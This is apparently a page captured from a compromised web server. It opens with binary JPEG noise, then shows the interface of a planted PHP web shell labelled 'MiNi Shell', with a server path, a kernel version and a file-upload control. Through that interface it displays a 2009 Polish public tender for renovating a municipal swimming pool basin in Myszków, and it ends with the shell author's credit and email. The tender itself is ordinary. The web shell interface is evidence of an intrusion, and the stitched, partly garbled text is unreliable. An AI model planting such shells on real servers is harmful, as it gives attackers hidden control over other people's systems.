JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/31195-N-2009.html

<p class="kh_header"><b>Myszków: REMONT NIEUŻYTKOWANEJ NIECKI BASENOWEJ MIEJSKIEGO OŚRODKA SPORTU I REKREACJI W MYSZKOWIE UL. MIEDZIANA 3.</b><br>
<b>Numer ogłoszenia: 31195 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji w Myszkowie , ul. Miedziana 3, 42-300 Myszków, woj. śląskie, tel. 034 313 25 81, faks 034 313 25 81.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT NIEUŻYTKOWANEJ NIECKI BASENOWEJ MIEJSKIEGO OŚRODKA SPORTU I REKREACJI W MYSZKOWIE UL. MIEDZIANA 3..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane związane z remontem nieużytkowanej niecki basenowej Miejskiego Ośrodka Sportu i Rekreacji w Myszkowie ul. Miedziana 3.
2.	Budynek w Myszkowie  przy ul. Miedzianej jako Miejski Ośrodek Sportu i Rekreacji w części posiada basen kąpielowy wyłączony z użytkowania w miesiącu grudniu 2008 r. na podstawie prawomocnej decyzji Powiatowego Inspektora Nadzoru Budowlanego w Myszkowie, z uwagi na konieczność przeprowadzenia ekspertyzy technicznej istniejącej konstrukcji nośnej przedmiotowej niecki basenowej. Zgodnie z przeprowadzonymi oględzinami popartymi analiza statyczno wytrzymałościową, konstrukcja nie stanowi zagrożenia dla budowli i ludzi. Niecka basenowa w rzucie lustra wody o wymiarach 12,70 m x 25,00 m i zmiennej głębokości od 1,45 m do ca. 3,90 m z obwodowa belka wypoczynkową, posiada zdemontowaną izolacje z folii basenowej odkrywającą wyprawy cementowe fragmentarycznie przeznaczone do naprawy i uzupełnienia. Podczas inwazyjnej metody badawczej częściowo zdemontowano osprzęt oraz fragmentarycznie odkryto (plażę) basenu.  W skład robót budowlanych Zamawiający przewiduje:
1. 	Wyłożenie dna basenu włókniną poliestrową 400g/m2	- 325m2	
2. Wyłożenie dna basenu folią PCV gr. 1,5mm pokrytą akrylem typ ALKORPLAN 2000	- 325m2
3. Wyłożenie ścian basenu włókniną poliestrową 400g/m2	- 250m2 
4. Wyłożenie ścian basenu folią PCV ALKORPLAN 2000	- 250m2 
5. Montaż kątownika z blachy pokrytej folią PCV w rogu pomiędzy ścianą a dnem	- 77m 
6. 	Montaż rynny z blachy pokrytej folią PCV w rynnie ceramicznej ( bez demontażu istniejącej rynny ceramicznej według indywidualnego rozwiązania Wykonawcy)	- 50m
7. Wyłożenie rynny przelewowej folią PCV lub nagrzanie folii PCV tylko w miejscach połączeń dwu metrowych elementów rynny z blachy oraz wyłożenie  folią PCV krawędzi rynny od strony basenu z dogrzaniem 15cm pasa folii za rynną od strony posadzki	- 50m
8. Kratka przelewowa PP do rynny szerokości 25 cm prostopadła do rynny (szczebelki)	 - 50m
9. Wiercenie otworów, montaż i uszczelnieni odpływów z rynny z kołnierzami z folii PCV	 - 16 szt.
10. Wiercenie otworów, montaż i uszczelnienie nowych dysz ściennych 	- 28 szt.
11. Wiercenie otworów, montaż i uszczelnienie muszli probierczych	- 2 szt.
12. Wiercenie otworów, montaż i uszczelnienie nowych dysz dennych 	- 10 szt.
13. Nagrzanie pasów torowych	- 190 m
14. Wyłożenie stopnia do stania w basenie blachą pokrytą folią PCV i Folią PCV NGP 	- 75 m
15. Montaż haków ze stali nierdzewnej do lin torowych	- 14 szt. 
16. Montaż kątownika z blachy pokrytej folią PCV na przełamaniu dna basenu (na górze) - 12,50 m
17. Montaż drabinek ze stali nierdzewnej 4 stopniowych	- 3 szt.
18. Montaż drabinek ze stali nierdzewnej 9 stopniowych	- 1 szt.
19. Odcięcie blachy pod rynną przelewową oraz zaszpachlowanie połączenia ściany z rynną - 50 m
20. Uzupełnienie ubytków w niecce, wypełnienie szczeliny zaprawą cementową za rynną, położenie płytek (1 rząd) za rynną przelewową oraz na ścianach szczytowych i zafugowanie wraz z uszczelnieniem - 1 kpl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.90-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
	warunek będzie spełniony jeżeli:
a)	z aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, załączonego do oferty i wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, będzie wynikał przedmiot działalności firmy, odpowiadający przedmiotowi zamówienia oraz będzie wynikało z tego dokumentu, że w stosunku do wykonawcy nie wszczęto postępowania upadłościowego, ani nie ogłoszono likwidacji, z wyjątkiem sytuacji kiedy wykonawca po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; Natomiast w przypadku, gdy Wykonawca będzie występował wspólnie z innymi Wykonawcami lub z podwykonawcami, w przedmiocie działalności firmy winien figurować zapis dotyczący co najmniej robót ogólnobudowlanych
b)	do oferty będą załączone dokumenty uprawniające kierownika budowy i kierowników robót do kierowania i nadzorowania robót budowlanych w specjalnościach odpowiadających przedmiotowi zamówienia oraz będą załączone zaświadczenia, że są oni aktualnymi członkami Izby Inżynierów Budownictwa i są ubezpieczeni od odpowiedzialności cywilnej w zakresie pełnionej funkcji;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
warunek będzie spełniony jeżeli:
a)	Wykonawca złoży oświadczenie potwierdzające, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - zgodnie z art. 22 ust. 1 pkt. 2 Prawa zamówień publicznych dotyczącego udziału w postępowaniu - wzór dokumentu podany przez Zamawiającego załączony jest do SIWZ,
b)	w wykazie wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, będzie pokazane przynajmniej jedno zadanie o wartości brutto nie mniejszej niż 100 000,00zł, odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (za zamówienia takie Zamawiający uzna wykonanie robót związanych z wyłożeniem ścian i dna basenu folią PCV gr. 1,5mm pokrytą akrylem typ ALKORPLAN 2000 o powierzchni większej, bądź równej 550m2 ) z podaniem wartości zadań, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie w przypadku podmiotów występujących wspólnie - przedmiotowy warunek winien spełniać lider podmiotów występujących wspólnie - wzór dokumentu załączony jest do SIWZ
c)	w wykazie osób, które będą uczestniczyć w wykonaniu zamówienia, załączonym do oferty, wykonawca poda imiona i nazwiska: kierownika budowy oraz przynajmniej 5 pracowników, przewidzianych do wykonania zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia oraz posiadanych uprawnień, przydatnych przy wykonywaniu zamówienia - wzór dokumentu załączony jest do SIWZ
d)	w wykazie podmiotów, które będą uczestniczyć w wykonaniu zamówienia, załączonym do oferty, Wykonawca poda nazwy i adresy firm, które przewidywane są do wykonania zamówienia(Wykonawcę również), jako podmioty występujące wspólnie lub podwykonawcy, określając zakres i wartość robót przewidzianych do wykonania przez poszczególne podmioty - wzór dokumentu załączony jest do SIWZ

3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
warunek będzie spełniony jeżeli:
a)	Wykonawca złoży oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - zgodnie z art. 22 ust. 1 pkt. 3 Prawa zamówień publicznych dotyczącego udziału w postępowaniu - wzór dokumentu podany przez Zamawiającego załączony jest do SIWZ,
b)	Wykonawca załączy do oferty aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności

4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
warunek będzie spełniony jeżeli:
a)	z aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, będzie wynikało, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub że uzyskał przewidziane prawem zwolnienie, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
b)	z aktualnej informacji z Krajowego Rejestru Karnego, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, będzie wynikało, że w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego
c)	z aktualnej informacji z Krajowego Rejestru Karnego, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, będzie wynikało, Se w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, Wykonawca jako podmiot zbiorowy, nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego
d)	z oświadczenia o spełnieniu warunków udziału w postępowaniu oraz z załączonych do oferty dokumentów, będzie wynikało, że Wykonawca spełnia wszystkie warunki udziału w postępowaniu i nie podlega wykluczeniu z tego postępowania
2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia. 
4.	Jeżeli zostanie wybrana oferta złożona przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, to zamawiający przed zawarciem umowy będzie żądał umowy regulującej współpracę tych wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. 	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, Wykonawca załączy do oferty następujące dokumenty:
1) 	oświadczenie o spełnieniu wszystkich warunków udziału w postępowaniu - wzór dokumentu załączony jest do SIWZ,
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) 	dokumenty uprawniające kierownika budowy i kierowników robót do kierowania i nadzorowania robót budowlanych w specjalnościach odpowiadających przedmiotowi zamówienia oraz będą załączone  zaświadczenia, że są oni aktualnymi członkami Izby Inżynierów Budownictwa i są ubezpieczeni od odpowiedzialności cywilnej w zakresie pełnionej funkcji,
4) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5) 	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6) 	aktualną informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
7) 	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - wzór dokumentu załączony jest do SIWZ;
8) 	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca - wzór dokumentu załączony jest do SIWZ,
9) 	wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia oraz uprawnień, niezbędnych do wykonania zamówienia -wzór dokumentu załączony jest do SIWZ,
10)	wykaz podmiotów, które będą uczestniczyć w wykonaniu zamówienia, z podaniem nazwy i adresu firm, które przewidywane są do wykonania zamówienia (wykonawcę również), określając zakres i wartość robót przewidzianych do wykonania przez poszczególne podmioty - wzór dokumentu załączony jest do SIWZ,
11) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
12) aktualna polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności,
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
1) 	zamiast dokumentów, o których mowa w pkt. 1 ust. 2, 4 i 6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) 	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) 	zamiast dokumentu określonego w pkt. 1 ust. 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
3. 	Dokumenty, o których mowa w pkt. 2 ust. 1 lit. a i c oraz w ust. 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 1 ust. 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5. Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
6.	Dokumenty, o których mowa w pkt. 1. ust. 1, 7, 8, 9, 10, i w pkt 4, są składane w oryginale.
7. 	Pozostałe dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez przedstawicieli Wykonawcy, wskazanych w dokumencie rejestrowym firmy lub w udzielonym pełnomocnictwie.
8. 	Na kserokopii dokumentu należy zamieścić zapis: (za zgodność z oryginałem) oraz datę i czytelny podpis lub parafkę i pieczątkę imienną.
9. 	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
10. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.miastomyszkow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Myszkowie, 
42-300 Myszków, 
ul. Miedziana 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego, przy ul. Miedzianej 3 w Myszkowie (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com